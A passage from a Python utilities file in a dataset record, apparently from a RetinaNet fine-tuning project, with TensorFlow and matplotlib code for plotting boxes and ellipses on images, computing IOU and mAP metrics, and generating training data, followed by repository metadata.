bool\n Whether to rescale the image into the [0, 255] range.\n :param figname: str\n The filename for the output figure.\n :param figformat: str\n The format of the output figure. Valid matplotlib.pyplot formats are accepted.\n \"\"\"\n\n image_list_np = []\n boxes_list = []\n labels_list = []\n\n if rescale:\n scaler = MinMaxScaler(feature_range=(0, 255))\n else:\n scaler = None\n\n for img, img_shape, boxes, labels in dataset.unbatch():\n\n if scaler is not None:\n image_list_np.append(scaler.fit_transform(img.numpy().reshape(-1, 1)).reshape(img.shape).astype('int32'))\n else:\n image_list_np.append(img.numpy())\n boxes_list.append(boxes.numpy())\n labels_list.append(tf.argmax(labels.to_tensor(), axis=1).numpy().flatten().astype('int32'))\n\n n_img = len(image_list_np)\n\n ncols = 3\n nrows = int(np.ceil(n_img / ncols))\n fig = plt.figure(figsize=(30, 10 * nrows))\n\n for ii in range(n_img):\n\n plt.subplot(nrows, ncols, ii + 1)\n\n image_np_annotated = image_list_np[ii].copy()\n\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated,\n boxes_list[ii],\n labels_list[ii] + label_id_offset,\n np.ones([boxes_list[ii].shape[0]]),\n category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=None,\n groundtruth_box_visualization_color='black',\n skip_scores=True,\n skip_labels=False,\n line_thickness=2)\n\n plt.imshow(image_np_annotated)\n\n plt.tight_layout()\n plt.savefig(figname + '.' + figformat, format=figformat)\n fig.clf()\n plt.close(fig)\n del fig\n\n\ndef plot_image_batch_with_ellipses(data_batch, category_index, ell2box=False, rescale=True,\n figname='image_batch_with_ellipses', figformat='pdf'):\n \"\"\"\n Plots a batch of images with their corresponding object annotation ellipses and labels.\n\n :param data_batch: tf.Dataset\n A batched tensorflow dataset object containing the entries:\n image, image shape, ellipses, labels\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param ell2box: bool\n Whether to also plot the bounding rectangles of the ellipses.\n :param rescale: bool\n Whether to rescale the image into the [0, 255] range.\n :param figname: str\n The filename for the output figure.\n :param figformat: str\n The format of the output figure. Valid matplotlib.pyplot formats are accepted.\n \"\"\"\n image_list_np = []\n shapes_list = []\n ellipse_list = []\n box_list = []\n labels_list = []\n\n if rescale:\n scaler = MinMaxScaler(feature_range=(0, 255))\n else:\n scaler = None\n\n for img, img_shape, ellipses, labels in data_batch.unbatch():\n # image_list_np.append(img.numpy().astype('int32'))\n if scaler is not None:\n image_list_np.append(scaler.fit_transform(img.numpy().reshape(-1, 1)).reshape(img.shape).astype('int32'))\n else:\n image_list_np.append(img.numpy())\n # print(img_shape)\n shapes_list.append(img_shape.numpy().astype('int32'))\n ellipse_list.append(ellipses.numpy())\n labels_list.append(labels.numpy().astype('int32'))\n if ell2box:\n ellipses = ellipses.to_tensor()\n boxes = bounding_rectagle(ellipses)\n box_list.append(boxes.numpy())\n\n for ii, image_np in enumerate(image_list_np):\n\n dpi = 400\n\n fig = plt.figure(figsize=(20, 10), dpi=dpi, tight_layout=True)\n ax = fig.add_subplot(1, 1, 1)\n _ = ax.imshow(image_np, aspect=1, interpolation='none')\n\n plt.rcParams[\"figure.autolayout\"] = True\n\n # plt.subplot(nrows, ncols, ii + 1)\n plot_gt_ellipses(ax, ellipse_list[ii], labels_list[ii], category_index, np.ones_like(ellipse_list[ii]))\n if box_list:\n plot_gt_boxes(ax, box_list[ii], labels_list[ii], category_index, np.ones_like(ellipse_list[ii]))\n\n cy = int(image_np.shape[0] // 2)\n cx = int(image_np.shape[1] // 2)\n\n # print(shapes_list[ii], cy, cx)\n plot_bb(ax, cx, cy, shapes_list[ii])\n # print(annot_list[ii])\n # print(labels_list[ii])\n\n if figname is not None:\n plt.savefig(figname + '_' + str(ii + 1) + '.' + figformat, format=figformat, dpi=dpi)\n else:\n plt.show()\n\n\ndef plot_bb(axis, cx, cy, shape):\n height, width, channels = shape\n\n rr = Rectangle(xy=(cx - width / 2, cy - height / 2), width=width, height=height)\n axis.add_artist(rr)\n rr.set_clip_box(axis.bbox)\n rr.set_color('green')\n rr.set_alpha(1)\n rr.set_linewidth(4)\n rr.set_fill(False)\n\n\ndef bounding_rectagle(ellipse_parameters):\n \"\"\"\n Compute the parameters of the bounding rectangles for a set of ellipses.\n\n :param ellipse_parameters: tf.Tensor\n Tensor of shape (n_objects, 5) with the ellipse parameters:\n x_center, y_center, x_radius, y_radius, rotation angle.\n :return: tf.Tensor\n Tensor of shape (n_objects, 4) with the resulting bounding box parameters:\n ymin, xmin, ymax, xmax\n \"\"\"\n cx = ellipse_parameters[:, 0]\n cy = ellipse_parameters[:, 1]\n rx = ellipse_parameters[:, 2]\n ry = ellipse_parameters[:, 3]\n theta = ellipse_parameters[:, 4]\n\n pi = tf.constant(np.pi)\n epsilon = 1e-10\n\n tx1 = tf.atan(-1 * (ry * tf.sin(theta)) / (rx * tf.cos(theta) + epsilon))\n tx2 = tx1 + pi\n # print(tx1, tx2)\n\n x1 = rx * tf.cos(theta) * tf.cos(tx1) - ry * tf.sin(theta) * tf.sin(tx1)\n x2 = rx * tf.cos(theta) * tf.cos(tx2) - ry * tf.sin(theta) * tf.sin(tx2)\n # print(x1, x2)\n\n # ty1 = np.arctan((ry * tf.cos(theta)) / (rx * tf.sin(theta) + epsilon))\n ty1 = tf.atan((ry * tf.cos(theta)) / (rx * tf.sin(theta) + epsilon))\n ty2 = ty1 + pi\n # print(ty1, ty2)\n\n y1 = rx * tf.sin(theta) * tf.cos(ty1) + ry * tf.cos(theta) * tf.sin(ty1)\n y2 = rx * tf.sin(theta) * tf.cos(ty2) + ry * tf.cos(theta) * tf.sin(ty2)\n # print(y1, y2)\n\n half_width = tf.reduce_max(tf.stack((x1, x2), axis=0), axis=0)\n half_height = tf.reduce_max(tf.stack((y1, y2), axis=0), axis=0)\n # tf.print(half_width)\n # tf.print(half_width.shape)\n\n ymin = cy - half_height\n xmin = cx - half_width\n ymax = cy + half_height\n xmax = cx + half_width\n\n rectangle_params = tf.stack((ymin, xmin, ymax, xmax), axis=1)\n\n return rectangle_params\n\n\ndef plot_gt_ellipses(axis, ellipses, classes, category_index, scores):\n\n for i, annot in enumerate(ellipses):\n cx, cy, rx, ry, theta = annot\n\n ell = Ellipse(xy=(cx, cy), width=2 * rx, height=2 * ry, angle=theta * 180.0 / np.pi, zorder=i + 2)\n axis.add_artist(ell)\n ell.set_clip_box(axis.bbox)\n ell.set_color('black')\n ell.set_alpha(1)\n ell.set_linewidth(0.2)\n ell.set_fill(False)\n\n\ndef plot_gt_boxes(axis, boxes, classes, category_index, scores):\n\n for i, annot in enumerate(boxes):\n ymin, xmin, ymax, xmax = annot\n\n rr = Rectangle(xy=(xmin, ymin), width=xmax - xmin, height=ymax - ymin)\n axis.add_artist(rr)\n rr.set_clip_box(axis.bbox)\n rr.set_color('blue')\n rr.set_alpha(1)\n rr.set_linewidth(0.2)\n rr.set_fill(False)\n\n\ndef get_lists_from_batch(data_batch):\n # Unpack the ragged tensors of this batch.\n # The first dimension of each ragged tensor is the batch size.\n images_batch_rtensor, gt_boxes_rtensor, gt_classes_rtensor = data_batch\n\n # Convert the ragged tensors of this batch to lists of tensors:\n images_list = tf.split(images_batch_rtensor, images_batch_rtensor.shape[0], axis=0)\n images_list = [tf.squeeze(item.to_tensor(), axis=0) for item in images_list]\n\n gt_boxes_list = tf.split(gt_boxes_rtensor, gt_boxes_rtensor.shape[0], axis=0)\n gt_boxes_list = [tf.squeeze(item.to_tensor(), axis=0) for item in gt_boxes_list]\n\n gt_classes_list = tf.split(gt_classes_rtensor, gt_classes_rtensor.shape[0], axis=0)\n gt_classes_list = [tf.squeeze(item.to_tensor(), axis=0) for item in gt_classes_list]\n\n return images_list, gt_boxes_list, gt_classes_list\n\n\ndef get_list_from_ragged_batch(data_batch):\n # Convert the ragged tensors of this batch to lists of tensors:\n tensor_list = tf.split(data_batch, data_batch.shape[0], axis=0)\n tensor_list = [tf.squeeze(item.to_tensor(), axis=0) for item in tensor_list]\n\n return tensor_list\n\n\ndef get_list_from_batch(data_batch):\n # Convert the ragged tensors of this batch to lists of tensors:\n tensor_list = tf.split(data_batch, data_batch.shape[0], axis=0)\n tensor_list = [tf.squeeze(item, axis=0) for item in tensor_list]\n\n return tensor_list\n\n\n@tf.function()\ndef compute_iou_matrix(box_arr1, box_arr2):\n \"\"\"\n Compute the IOU matrix for two sets of bounding boxes.\n\n :param box_arr1: tf.Tensor\n Tensor of shape (n_objects, 4) with the first set of bounding box parameters.\n :param box_arr2: tf.Tensor\n Tensor of shape (n_objects, 4) with the second set of bounding box parameters.\n :return: tf.Tensor\n The resulting IOU matrix.\n \"\"\"\n\n epsilon = tf.constant(1e-9, dtype='float32')\n\n x11, y11, x12, y12 = tf.split(box_arr1, 4, axis=1)\n x21, y21, x22, y22 = tf.split(box_arr2, 4, axis=1)\n\n xA = tf.maximum(x11, tf.transpose(x21))\n yA = tf.maximum(y11, tf.transpose(y21))\n xB = tf.minimum(x12, tf.transpose(x22))\n yB = tf.minimum(y12, tf.transpose(y22))\n\n interArea = tf.maximum((xB - xA + epsilon), 0) * tf.maximum((yB - yA + epsilon), 0)\n boxAArea = (x12 - x11 + epsilon) * (y12 - y11 + epsilon)\n boxBArea = (x22 - x21 + epsilon) * (y22 - y21 + epsilon)\n\n iou_matrix = interArea / (boxAArea + tf.transpose(boxBArea) - interArea)\n\n return iou_matrix\n\n\n@tf.function()\ndef compute_map_iou_per_image(gt_boxes_tensor, gt_labels_tensor, pred_boxes_tensor, pred_labels_tensor,\n pred_boxes_scores,\n iou_threshold=0.5, n_scores=100):\n \"\"\"\n Compute the mean average precision (mAP) and the mean IOU for an image. The mean is taken across all classes,\n and in case of the mean IOU, across all score thresholds for each class.\n :param gt_boxes_tensor: tf.Tensor, shape=(n_boxes,4), dtype=float32\n A tensor with the ground truth boxes holding (ymin, xmin, ymax, xmax) values for each box in\n relative coordinates in [0,1].\n :param gt_labels_tensor: tf.Tensor, shape=(n_boxes,), dtype=int32\n A tensor with the ground truth class labels (starting from 0).\n :param pred_boxes_tensor: tf.Tensor, shape=(n_boxes,4), dtype=float32\n A tensor with the predicted boxes holding (ymin, xmin, ymax, xmax) values for each box in\n relative coordinates in [0,1].\n :param pred_labels_tensor: tf.Tensor, shape=(n_boxes,), dtype=int32\n A tensor with the predicted class labels (starting from 0).\n :param pred_boxes_scores: tf.Tensor, shape=(n_boxes,), dtype=float32\n A tensor with the probability scores (of the predicted class) of the predicted boxes.\n :param iou_threshold: float\n Threshold of the IOU metric in the computation of the mean average precision (mAP).\n :param n_scores: int\n The number of score thresholds for sampling the precision-recall curve.\n :return: (tf.Tensor, tf.Tensor)\n The mean average precision (across classes) and the mean IOU (across scores and classes).\n \"\"\"\n epsilon = tf.constant(1e-10)\n\n classes = tf.unique(gt_labels_tensor).y # determine the unique classes present in current image, ...\n num_cl = tf.shape(classes)[0] # ... and count them\n\n # initialize tensor array for aggregating each average precision value per class\n average_precisions = tf.TensorArray(tf.float32, size=num_cl, dynamic_size=False, clear_after_read=True)\n scores_maxf1 = tf.TensorArray(tf.float32, size=0, dynamic_size=True, clear_after_read=True)\n mean_ious = tf.TensorArray(tf.float32, size=num_cl, dynamic_size=False, clear_after_read=True)\n\n # loop over the classes present in the current image:\n for jj in tf.range(num_cl):\n\n i_class = classes[jj]\n\n # initialize tensor arrays for aggregating the precisions and recalls for each score threshold:\n precisions = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n recalls = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n ious = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n f1scores = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n\n # get the ground truth boxes corresponding to the current (i_class) class:\n index_gt_class = \\\n tf.squeeze(tf.where(\n tf.equal(gt_labels_tensor, i_class)\n ), axis=1)\n gt_boxes_tensor_class = tf.reshape(tf.gather(gt_boxes_tensor, index_gt_class), shape=(-1, 4))\n\n # get the scores corresponding to the current (i_class) class:\n pred_boxes_scores_class = tf.gather(pred_boxes_scores,\n tf.squeeze(tf.where(tf.equal(pred_labels_tensor, i_class))))\n # determine max score for current class:\n max_score_class = tf.reduce_max(pred_boxes_scores_class)\n # create score grid for current class for sampling the precision-recall curve:\n scores = tf.cast(tf.linspace(0.0, max_score_class, n_scores), dtype='float32')\n # NOTE: the number of true positives for a score threshold above the maximum score will be zero,\n # therefore the recall will be undefined. For the cases, the precision vs recall curve takes the constant\n # value of precision=1 at all recalls by definition. We account for this by setting the upper limit for\n # the score grid to max(score) for the class, and by adding the last precision recall point at the end of\n # the loop below:\n\n # for i_score, score in enumerate(scores[:-1]):\n for i_score in tf.range(n_scores - 1):\n score = scores[i_score]\n\n # get the predicted boxes corresponding to the current (i_class) class:\n index_pred_class = \\\n tf.squeeze(tf.where(\n tf.logical_and(tf.equal(pred_labels_tensor, i_class),\n tf.greater_equal(pred_boxes_scores, score))\n ), axis=1)\n pred_boxes_tensor_class = tf.gather(pred_boxes_tensor, index_pred_class)\n\n # Compute IOU matrix: rows correspond to gt boxes, columns to predicted boxes of current class:\n iou_matrix_class = compute_iou_matrix(gt_boxes_tensor_class, pred_boxes_tensor_class)\n\n mean_iou_boxes = tf.reduce_mean(tf.reduce_max(iou_matrix_class, axis=1))\n\n # Compute the number of true positives for this class:\n # count the rows in `iou_matrix_class` that have (at least) one iou > iou_threshold column\n tp = tf.reduce_sum(tf.cast(\n tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1),\n dtype='float32'))\n\n # Compute the number of false negatives for this class:\n # count the rows in `iou_matrix_class` that do not have any iou > iou_threshold column\n fn = tf.reduce_sum(tf.cast(\n tf.logical_not(tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1)),\n dtype='float32'))\n\n # Compute the number of false positives for this class:\n # count the columns in `iou_matrix_class` that do not have any iou > iou_threshold row\n fp1 = tf.reduce_sum(tf.cast(\n tf.logical_not(tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=0)),\n dtype='float32'))\n # for each row in `iou_matrix_class`, count all redundant iou > iou_threshold columns\n # get a boolean mask for the rows with at least one detection\n mask = tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1)\n # get a subset of the iou matrix with the above boolean mask\n iou_matrix_class_detections = tf.boolean_mask(iou_matrix_class, mask)\n # count all redundant detections\n fp2 = tf.reduce_sum(tf.reduce_sum(tf.cast(tf.greater_equal(iou_matrix_class_detections, iou_threshold),\n dtype='float32'), axis=1) - 1)\n\n fp = fp1 + fp2\n\n precision = tp / (tp + fp + epsilon)\n recall = tp / (tp + fn + epsilon)\n\n f1score = 2 * precision * recall / (precision + recall + epsilon)\n\n recalls = recalls.write(i_score, recall)\n precisions = precisions.write(i_score, precision)\n f1scores = f1scores.write(i_score, f1score)\n ious = ious.write(i_score, mean_iou_boxes)\n\n recalls = recalls.write(n_scores - 1, 0)\n precisions = precisions.write(n_scores - 1, 1)\n f1scores = f1scores.write(n_scores - 1, 0)\n\n recalls = recalls.stack()\n precisions = precisions.stack()\n mean_iou_class = tf.reduce_mean(ious.stack())\n mean_ious = mean_ious.write(jj, mean_iou_class)\n\n # compute AP without interpolation:\n average_precision = tf.abs(-tf.reduce_sum(tf.experimental.numpy.diff(recalls) * precisions[:-1]))\n average_precisions = average_precisions.write(jj, average_precision)\n\n # compute detection score at maximum f1score:\n f1scores = f1scores.stack()\n argmax_f1scores = tf.argmax(f1scores)\n score_maxf1 = tf.gather(scores, argmax_f1scores)\n # save detection score at maximum f1score for each class only if it is non-zero:\n if tf.greater(score_maxf1, 0.):\n scores_maxf1 = scores_maxf1.write(jj, tf.stack([tf.cast(i_class, dtype=tf.float32), score_maxf1], axis=0))\n\n mean_iou = tf.reduce_mean(mean_ious.stack())\n\n # Stack the score_maxf1 values. The returned tensor will have two columns, the first will hold the classes\n # for which scores_maxf1 is non-zero, and the second will hold the scores_maxf1 value for that class.\n scores_maxf1 = scores_maxf1.stack()\n\n mean_average_precision = tf.reduce_mean(average_precisions.stack())\n\n return mean_average_precision, mean_iou, scores_maxf1\n\n\n@tf.function()\ndef compute_map_iou_per_batch(gt_boxes_tensors, gt_one_hot_labels_tensors, detections, batch_size,\n iou_threshold=0.5, n_scores=100, num_classes=1):\n # initialize tensor array for aggregating mAP values for each image in the batch:\n mean_average_precisions_batch = \\\n tf.TensorArray(tf.float32, size=batch_size, dynamic_size=False, clear_after_read=True)\n mean_iou_batch = \\\n tf.TensorArray(tf.float32, size=batch_size, dynamic_size=False, clear_after_read=True)\n scores_maxf1_batch = \\\n tf.TensorArray(tf.float32, size=0, dynamic_size=True, clear_after_read=True, infer_shape=False)\n scores_maxf1 = \\\n tf.TensorArray(tf.float32, size=num_classes, dynamic_size=False, clear_after_read=True)\n\n for ii in range(batch_size):\n # invert one-hot encodings back to 'dense' labels:\n gt_labels_tensor = tf.cast(tf.argmax(gt_one_hot_labels_tensors[ii], axis=1), dtype='int32')\n gt_boxes_tensor = gt_boxes_tensors[ii]\n\n # unpack the predicted classes and boxes from the `detections` dictionary:\n pred_labels_tensor = tf.cast(detections['detection_classes'][ii], dtype='int32')\n pred_boxes_tensor = detections['detection_boxes'][ii]\n pred_boxes_scores = detections['detection_scores'][ii]\n\n # ------------------------------------------------------------------------------\n\n mean_average_precision, mean_iou, scores_maxf1_img = \\\n compute_map_iou_per_image(gt_boxes_tensor, gt_labels_tensor,\n pred_boxes_tensor, pred_labels_tensor, pred_boxes_scores,\n iou_threshold=iou_threshold, n_scores=n_scores)\n\n mean_average_precisions_batch = mean_average_precisions_batch.write(ii, mean_average_precision)\n mean_iou_batch = mean_iou_batch.write(ii, mean_iou)\n scores_maxf1_batch = scores_maxf1_batch.write(ii, scores_maxf1_img)\n\n map_batch = tf.reduce_mean(mean_average_precisions_batch.stack())\n mean_iou_batch = tf.reduce_mean(mean_iou_batch.stack())\n\n scores_maxf1_all = scores_maxf1_batch.concat()\n # Loop through the classes and determine the mean score_maxf1. If there were no detections for that class\n # in this batch, the score_maxf1 or it will be nan.\n for i_class in tf.range(num_classes):\n # mask = tf.equal(scores_maxf1_all[:, 0], tf.cast(i_class, tf.float32))\n # if tf.not_equal(tf.size(mask), 0):\n # scores_maxf1_class = tf.boolean_mask(scores_maxf1_all[:, 1], mask, axis=0)\n\n index_class = tf.where(tf.equal(scores_maxf1_all[:, 0], tf.cast(i_class, tf.float32)))\n scores_maxf1_class = tf.gather(scores_maxf1_all[:, 1], index_class)\n scores_maxf1 = scores_maxf1.write(i_class, tf.reduce_mean(scores_maxf1_class))\n\n scores_maxf1 = scores_maxf1.stack()\n\n return map_batch, mean_iou_batch, scores_maxf1\n\n\ndef get_datagen(image_path_list, gt_boxes_list, gt_labels_list, num_classes, label_id_offset):\n \"\"\"\n Returns a data generator for feeding a tensorflow.Dataset object.\n\n :param image_path_list: array-like\n List of the image files.\n :param gt_boxes_list: list of numpy.ndarray\n List of bounding box arrays corresponding to the images in `image_path_list`.\n Each array has a shape of (n_boxes, 4) where the 4 columns contain the (ymin, xmin, ymax, xmax) values in\n relative coordinates in [1,0].\n :param gt_labels_list: list of numpy.ndarray\n List of classification label arrays.\n :param num_classes: int\n The total number of ground truth classes\n :param label_id_offset: int\n The offset of label id's with respect to a labelling scheme that starts with 0.\n :return: generator function\n \"\"\"\n\n def datagen():\n for (image_path, gt_boxes_np, gt_labels_np) in zip(image_path_list, gt_boxes_list, gt_labels_list):\n # # Load next image into PIL format:\n # image_pil = tf.keras.utils.load_img(image_path)\n # # Convert the image into a numpy array:\n # image_np = tf.keras.preprocessing.image.img_to_array(image_pil, dtype='uint8')\n # # Covert the image array into tensor and add a batch dimension:\n # image_tensor = tf.expand_dims(tf.convert_to_tensor(image_np, dtype=tf.float32), axis=0)\n\n image = tf.io.read_file(image_path)\n image_tensor = tf.io.decode_image(image, channels=3, dtype=tf.uint8)\n image_shape = tf.convert_to_tensor(image_tensor.shape, dtype=tf.int32)\n image_tensor = tf.cast(image_tensor, dtype=tf.float32)\n\n # Run the image tensor through the model's preprocessing method\n # this requires a batch dimension:\n # image_tensor = tf.expand_dims(image_tensor, axis=0)\n # image_tensor = tf.squeeze(model.preprocess(image_tensor)[0], axis=0)\n image_tensor = tf.RaggedTensor.from_tensor(image_tensor, row_splits_dtype=tf.int32)\n\n # Convert the groundtruth boxes from numpy array into tensor:\n gt_boxes_tensor = tf.convert_to_tensor(gt_boxes_np, dtype=tf.float32)\n gt_boxes_rtensor = tf.RaggedTensor.from_tensor(gt_boxes_tensor, row_splits_dtype=tf.int32)\n\n # Offset the groundtruth labels to start from 0,\n # convert the labels numpy array into tensor,\n # and change the labels into one-hot representation:\n zero_indexed_groundtruth_classes = tf.convert_to_tensor(gt_labels_np - label_id_offset)\n val_gt_one_hot_labels_tensor = tf.one_hot(zero_indexed_groundtruth_classes, num_classes)\n val_gt_one_hot_labels_rtensor = tf.RaggedTensor.from_tensor(val_gt_one_hot_labels_tensor,\n row_splits_dtype=tf.int32)\n\n yield image_tensor, image_shape, gt_boxes_rtensor, val_gt_one_hot_labels_rtensor\n\n return datagen\n", "repo_name": "idekany/TuneRetinaNet", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 38912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 152, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.GFile", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 167, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 168, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 168, "usage_type": "name"}, {"api_name": "six.BytesIO", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 171, "usage_type": "attribute"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 199, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 261, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 279, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 280, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 285, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 285, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 295, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 296, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 302, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 310, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 313, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 347, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 363, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 364, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 364, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 368, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 368, "usage_type": "name"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 372, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 372, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 387, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 387, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 390, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 421, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 444, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 444, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 448, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 448, "usage_type": "name"}, {"api_name": "numpy.ones_like", "line_number": 451, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 464, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 464, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 466, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 466, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 472, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 498, "usage_type": "attribute"}, {"api_name": "tensorflow.atan", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 505, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 505, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 506, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 506, "usage_type": "call"}, {"api_name": "tensorflow.atan", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 514, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 514, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 515, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 515, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 518, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 518, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 519, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 519, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 528, "usage_type": "call"}, {"api_name": "matplotlib.patches.Ellipse", "line_number": 538, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 538, "usage_type": "attribute"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 552, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 567, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 568, 